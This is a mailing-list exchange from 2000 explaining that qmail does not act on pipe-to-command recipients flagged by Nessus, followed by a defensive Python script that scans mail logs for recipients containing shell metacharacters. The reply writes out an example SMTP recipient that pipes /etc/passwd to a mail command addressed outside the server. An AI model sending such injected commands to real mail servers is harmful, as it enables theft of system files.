On Sat, Jun 03, 2000 at 04:29:07AM +0000, Jim Breton wrote:
> On Fri, Jun 02, 2000 at 11:17:30PM -0500, Bob Waskosky wrote:
> > Is this a hole and how would I plug it?
> 
> 
> No it's not a hole.  It would only be a security concern if your mailer
> were to allow the message to actually be piped directly to the program
> specified in the "rcpt to" command.
> 
> Say for example I were to send this command:
> 
> rcpt to: "|mail [EMAIL PROTECTED] < /etc/passwd"
> 
> or something similar.  And your MTA happily piped my message to that
> program, which also took /etc/passwd as input and mailed it to me at
> [EMAIL PROTECTED].  _That_ would be a problem.
> 
> With qmail however, pipe symbols are not treated specially and don't
> have the same meaning as they would in a shell.  They are handled as
> though they are part of a username, and since you don't have a local
> user "|mail" the message is treated as any normal message to an unknown
> user.
> 
> You don't need to change anything.  :)  Nessus assumes that because your
> mailer "accepted" the message, it will also deliver it in an "evil"
> way... which qmail won't do.
> 
kewl. Thanks for the info.

-- 
I fish therefore I lie.
Bob Waskosky <[EMAIL PROTECTED]>
The Perl Zone - http://www.nobhead.com/perl/
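
One way to check the point made in the quoted reply against the mail server's own logs, as an added example that is not part of the original thread: pair each delivery attempt with its outcome and list recipients containing shell metacharacters, so a scanner finding based only on SMTP acceptance can be compared with what the mailer actually did. The log lines are constructed, and the line patterns are an assumption modelled on qmail-send's log output; the function and field names are hypothetical.

```python
import re

# Constructed sample lines. Assumed shape, modelled on qmail-send logs:
#   "starting delivery N: msg M to local|remote ADDR"
#   "delivery N: success|failure|deferral: TEXT"
SAMPLE_LOG = """\
new msg 93421
info msg 93421: bytes 412 from <scanner@example.net> qp 2201 uid 71
starting delivery 7: msg 93421 to local |mail@mx.example.org
status: local 1/10 remote 0/20
delivery 7: failure: Sorry,_no_mailbox_here_by_that_name._(#5.1.1)/
end msg 93421
new msg 93422
starting delivery 8: msg 93422 to local bob@mx.example.org
delivery 8: success: did_0+0+1/
end msg 93422
"""

START = re.compile(r"starting delivery (\d+): msg (\d+) to (local|remote) (.+)$")
RESULT = re.compile(r"delivery (\d+): (success|failure|deferral): (.*)$")
SHELL_META = set("|<>;&`$")


def triage(log_text):
    """Return one record per finished delivery whose recipient contains a
    shell metacharacter, with the outcome the mailer logged for it."""
    pending, findings = {}, []
    for line in log_text.splitlines():
        m = START.search(line)
        if m:
            # Remember the attempt until its result line shows up.
            pending[m.group(1)] = (m.group(2), m.group(3), m.group(4))
            continue
        m = RESULT.search(line)
        if m and m.group(1) in pending:
            msg, channel, rcpt = pending.pop(m.group(1))
            if SHELL_META & set(rcpt):
                findings.append({
                    "msg": msg, "rcpt": rcpt, "channel": channel,
                    "status": m.group(2), "detail": m.group(3),
                    # An unknown-user failure is the expected outcome; any
                    # other status deserves a look at how it was delivered.
                    "needs_review": m.group(2) != "failure",
                })
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f["rcpt"], f["status"], "review" if f["needs_review"] else "ok")
```

A record with `needs_review` set means only that the address was not rejected as an unknown user, so the delivery instructions for that address are the next thing to inspect.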